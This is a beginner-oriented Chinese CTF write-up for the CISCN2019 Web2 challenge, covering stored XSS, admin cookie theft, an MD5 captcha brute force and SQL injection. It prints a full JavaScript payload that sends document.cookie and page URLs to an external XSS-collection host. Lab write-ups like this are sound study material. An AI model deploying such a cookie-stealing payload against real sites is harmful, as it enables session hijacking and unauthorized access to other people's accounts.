1. 程式人生 > 實用技巧 >[CISCN2019 華東北賽區]Web2 WriteUp

[CISCN2019 華東北賽區]Web2 WriteUp

[CISCN2019 華東北賽區]Web2 WriteUp

前言

這是一道xss結合sql注入的題目,當時在寫的時候想了很久,最後看大佬的題解覺得不太適合我這樣的新手來看,於是心血來潮想寫一篇小白向的WriteUp。

一.開啟環境

在這裡插入圖片描述
在這裡插入圖片描述
發現是一個網站,有投稿和反饋功能。這個比較重要。
我們很容易想到,可以投稿,然後點選稽核,管理員就會來到我們的頁面,稽核我們的投稿
這樣的話我們可以構造惡意程式碼,讓管理員進去,從而竊取管理員的cookie,進入後臺。
開啟投稿和反饋介面,隨意註冊一下登入:
在這裡插入圖片描述
在這裡插入圖片描述
確定是xss。

二.構造XSS程式碼

構造所需要的xss程式碼並不需要我們自己去寫。

只需要登入一下http://xss.buuoj.cn/
然後註冊登入,建立一個專案就好:
在這裡插入圖片描述
在這裡插入圖片描述
自己可以研究一下那一摞程式碼都是幹嘛的,我們這裡並不需要明白。
複製以下程式碼
(function(){(new Image()).src=‘http://xss.buuoj.cn/index.php?do=api&id=T6A1kl&location=’+escape((function() {try{return document.location.href}catch(e){return ‘’}})())+’&toplocation=’+escape((function(){try{return top.location.href}catch(e){return ‘’}})())+’&cookie=’+escape((function(){try{return document.cookie}catch(e){return ‘’}})())+’&opener=’+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:’’}catch(e){return ‘’}})());})()
注意id一定要是你專案生成的id

然後把”(new Image()).src“改成“window.location.href”
再利用指令碼:
在這裡插入圖片描述
進行轉碼繞過保護。
複製payload_final,
傳遞到投稿介面。
在這裡插入圖片描述
在這裡插入圖片描述檢視頁面原始碼

在這裡插入圖片描述
複製如圖的網址,開啟反饋介面貼上,在前面加上
http://web。
在這裡插入圖片描述
接下來需要考慮驗證碼,這裡涉及到雜湊碰撞和生日攻擊。簡單來說就是暴力破解;指令碼如圖所示:
在這裡插入圖片描述
在md5[0:6]後面加上你的頁面所顯示的6位字元
執行等待。
在這裡插入圖片描述
填入。
在這裡插入圖片描述接下來我們去自己建立的xss專案裡看。
在這裡插入圖片描述

在這裡插入圖片描述

複製cookie,利用火狐的外掛修改自己的cookie
很容易找到後臺網址後面加上admin.php

在這裡插入圖片描述沒有管理cookie的情況下是這樣的
在這裡插入圖片描述

有了管理員許可權後是這樣的
好,我們已經成功進入後臺,出現了一個查詢框

在這裡插入圖片描述

slq注入。

在這裡插入圖片描述

結束。